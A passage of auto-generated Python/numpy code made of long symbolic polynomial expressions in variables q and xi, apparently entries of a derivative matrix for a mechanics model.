0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 1053.49794238683*xi**4*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0]) + 4.44444444444444*xi**2*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (-2405279374.73864*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 898984.910836762*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 6320.98765432099*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 30441817.0865359*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 53.3333333333333*q[0, 0] + 26.6666666666667*q[1, 0] + 26.6666666666667*q[2, 0])*(60131984.3684659*xi**9*(-4*q[3, 0] - 4*q[4, 0] + 8*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 60131984.3684659*xi**9*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(-3*q[3, 0] - 3*q[4, 0] + 6*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 1522090.85432679*xi**7*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) + 22474.6227709191*xi**5*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(-2*q[3, 0] - 2*q[4, 0] + 4*q[5, 
0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45) - 79.0123456790123*xi**3*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi), 0, 0, 0, 0, 0, 0, 0, 0, 0], [-99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 4.44444444444444*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])**2*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (252839.506172839*(q[1, 0] - q[2, 0])**2*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 23972930.955647*(q[1, 0] - q[2, 0])**2*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 
0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 38484469995.8182*(q[1, 0] - q[2, 0])**2*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3)*(-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + (12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3)*(60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - 
q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)) + 2106.99588477366*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(4*q[0, 0] - 2*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(6*q[0, 0] - 3*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 
12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(8*q[0, 0] - 4*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 25656313330.5455*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 811781788.97429*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 15981953.9704313*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 168559.670781893*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 711.111111111111*numpy.sqrt(3)*(q[1, 0] - q[2, 0])), -160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 160351958.315909*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 
4.44444444444444*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 1053.49794238683*numpy.sqrt(3)*(-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + 1053.49794238683*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 160351958.315909*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1053.49794238683*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 4.44444444444444*numpy.sqrt(3)*(q[0, 0] + q[1, 0] + q[2, 0] + 0.45) + (60131984.3684659*xi**9*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 - 1522090.85432679*xi**7*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 + 22474.6227709191*xi**5*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 - 79.0123456790123*xi**3*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(2*q[3, 0]**2 - 2*q[3, 0]*q[4, 0] - 2*q[3, 0]*q[5, 0] + 2*q[4, 0]**2 - 2*q[4, 0]*q[5, 0] + 2*q[5, 0]**2) + (1/3)*xi*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(-4810558749.47727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 121767268.346143*numpy.sqrt(3)*(q[1, 0] - 
q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 1797969.82167352*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 12641.975308642*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0]) - 4810558749.47727*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 121767268.346143*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 1797969.82167352*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 12641.975308642*numpy.sqrt(3)*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 26.6666666666667*numpy.sqrt(3)) + (-160351958.315909*xi**10*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*xi**8*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*xi**6*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*xi**2*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*(12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 
0]*q[2, 0] + q[2, 0]**2)**3 + 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(-q[0, 0] + 2*q[1, 0] - q[2, 0])*(2*q[0, 0] - q[1, 0] - q[2, 0]) - 12828156665.2727*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 - 405890894.487145*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 7990976.98521566*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 84279.8353909465*numpy.sqrt(3)*(q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 355.555555555555*numpy.sqrt(3)*(q[1, 0] - q[2, 0]) + 12828156665.2727*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + 405890894.487145*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 - 7990976.98521566*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 + 84279.8353909465*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) - 355.555555555555*numpy.sqrt(3)*(2*q[0, 0] - q[1, 0] - q[2, 0])) + (-160351958.315909*numpy.sqrt(3)*xi**10*(q[4, 0] - q[5, 0])*(q[3, 
0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**4 + 5073636.18108931*numpy.sqrt(3)*xi**8*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**3 - 99887.2123151958*numpy.sqrt(3)*xi**6*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2)**2 + 1053.49794238683*numpy.sqrt(3)*xi**4*(2*q[3, 0] - q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45)*(q[3, 0]**2 - q[3, 0]*q[4, 0] - q[3, 0]*q[5, 0] + q[4, 0]**2 - q[4, 0]*q[5, 0] + q[5, 0]**2) - 4.44444444444444*numpy.sqrt(3)*xi**2*(q[4, 0] - q[5, 0])*(q[3, 0] + q[4, 0] + q[5, 0] + 0.45))*((-76968939991.6364*q[1, 0] + 76968939991.6364*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**4 + (-47945861.911294*q[1, 0] + 47945861.911294*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 38484469995.8182*(q[1, 0] - q[2, 0])**2*(-4*q[0, 0] + 8*q[1, 0] - 4*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**3 + 1217672683.46143*(q[1, 0] - q[2, 0])**2*(-3*q[0, 0] + 6*q[1, 0] - 3*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2)**2 - 23972930.955647*(q[1, 0] - q[2, 0])**2*(-2*q[0, 0] + 4*q[1, 0] - 2*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + 252839.506172839*(q[1, 0] - q[2, 0])**2*(-q[0, 0] + 2*q[1, 0] - q[2, 0]) + (505679.012345679*q[1, 0] - 505679.012345679*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 0]**2) + (2435345366.92287*q[1, 0] - 2435345366.92287*q[2, 0])*(q[0, 0]**2 - q[0, 0]*q[1, 0] - q[0, 0]*q[2, 0] + q[1, 0]**2 - q[1, 0]*q[2, 0] + q[2, 
